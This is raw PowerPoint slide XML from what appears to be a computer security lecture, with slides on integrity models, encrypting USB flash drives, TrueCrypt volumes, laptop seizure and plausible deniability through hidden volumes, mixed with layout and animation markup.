            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Biba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Low-Watermark model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Clark-Wilson model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Chinese Wall model (The Brewer and Nash model)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94759074-FD2C-4344-8997-BA6EDF992768}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4100" name="Picture 4" descr="C:\Documents and Settings\goodrich\Local Settings\Temporary Internet Files\Content.IE5\TAQOHR0Z\MP900390562[1].jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="3276600"/>
            <a:ext cx="2696198" cy="192328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Encrypting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> USB Flash Drives</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1524000"/>
            <a:ext cx="8229600" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>In a perfect world, we would not store sensitive data on portable devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>All sensitive data should be held on secure servers.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Unfortunately, this approach is not always practical.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" smtClean="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Design goals for data encryption on portable devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Run on the device only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not require  host installation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compatible with different platforms and file systems </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Work from a nonprivileged account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fast and possibly free …</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80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27897348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smtClean="0"/>
              <a:t>TrueCrypt</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Free open-source disk encryption software for Windows 7/Vista/XP, Mac OS X, and Linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Creates an encrypted area (virtual encrypted disk) inside an ordinary file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>In Windows, when the user provides the correct password, the file becomes a volume in My Computer with a drive letter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Symbol"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>just like inserting a USB drive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Files copied to/from this encrypted volume are encrypted/decrypted on the fly, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>automatically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>transparently</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRP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81</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7467600" y="381000"/>
            <a:ext cx="800100" cy="981075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="381000"/>
            <a:ext cx="800100" cy="981075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11291784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Create an encrypted volume on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>usb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> flash drive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Segnaposto testo 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" smtClean="0"/>
              <a:t>DEMO 1</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="320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82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1155005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457200" y="152400"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Laptop Seizure and Deniability</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Segnaposto contenuto 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8382000" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Laptops and other electronic devices may be inspected, and even seized by police officers and other government personnel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Usually requires a warrant from a judge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A notable exception is the broad search and seizure authority granted to US customs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scenario described in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Defeating Encrypted and Deniable File Systems, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Czekis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> et al.,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>2006</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Alice is a human-rights worker who has sensitive information on her laptop </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>She uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>TrueCrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> but she is concerned that the secret police will seize her computer and ask her to reveal the decryption key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>She needs to protect her data in such a way that her encrypted files are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deniable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>nothing should reveal to the secret police that there are hidden files on her computer</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83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1715734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Plausible Deniability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1447800"/>
            <a:ext cx="8305800" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="11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smtClean="0"/>
              <a:t>Political doctrine developed in the US in the 50's</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>If illegal operations are discovered, it should be possible to deny any connection or guilt of the principals</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2600" dirty="0" smtClean="0">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Applied to CIA operations. (i.e., Bay of Pigs failed invasion of Cuba)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>In general, plausible deniability refers to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Any act that leaves little or no evidence of irregularities or abuse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>In computer parlance, it is the ability to deny the presence of data hidden within a container</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="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84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1657552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14375" y="214313"/>
            <a:ext cx="7672388" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0070C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err="1" smtClean="0"/>
              <a:t>TrueCrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" smtClean="0"/>
              <a:t> Hidden Volume</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4000" b="1">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13315" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1371600"/>
            <a:ext cx="7401636" cy="5486400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="1905000"/>
            <a:ext cx="3886200" cy="1371600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1357322 w 2714644"/>
              <a:gd name="T1" fmla="*/ 0 h 1000132"/>
              <a:gd name="T2" fmla="*/ 0 w 2714644"/>
              <a:gd name="T3" fmla="*/ 500066 h 1000132"/>
              <a:gd name="T4" fmla="*/ 1357322 w 2714644"/>
              <a:gd name="T5" fmla="*/ 1000132 h 1000132"/>
              <a:gd name="T6" fmla="*/ 2714644 w 2714644"/>
              <a:gd name="T7" fmla="*/ 500066 h 1000132"/>
              <a:gd name="T8" fmla="*/ 125017 w 2714644"/>
              <a:gd name="T9" fmla="*/ 125017 h 1000132"/>
              <a:gd name="T10" fmla="*/ 2589628 w 2714644"/>
              <a:gd name="T11" fmla="*/ 875116 h 1000132"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T8" t="T9" r="T10" b="T11"/>
            <a:pathLst>
              <a:path w="2714644" h="1000132">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2714644" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2714644" y="1000132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1000132"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="125017" y="125017"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="125017" y="875116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2589628" y="875116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2589628" y="125017"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="A2A2A2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13317" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="1295400"/>
            <a:ext cx="1857375" cy="64851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Padded with random bits</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13318" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="9240000">
            <a:off x="7178112" y="1998296"/>
            <a:ext cx="1285875"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7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94759074-FD2C-4344-8997-BA6EDF992768}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12815002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3315"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(in)">
                                      <p:cBhvr additive="repl">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childTnLst>
                                    <p:set>
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13316"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13316"/>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additive="repl">
                                        <p:cTn id="15" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13318"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13318"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav>
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13318"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav>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additive="repl">
                                        <p:cTn id="20" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13317"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
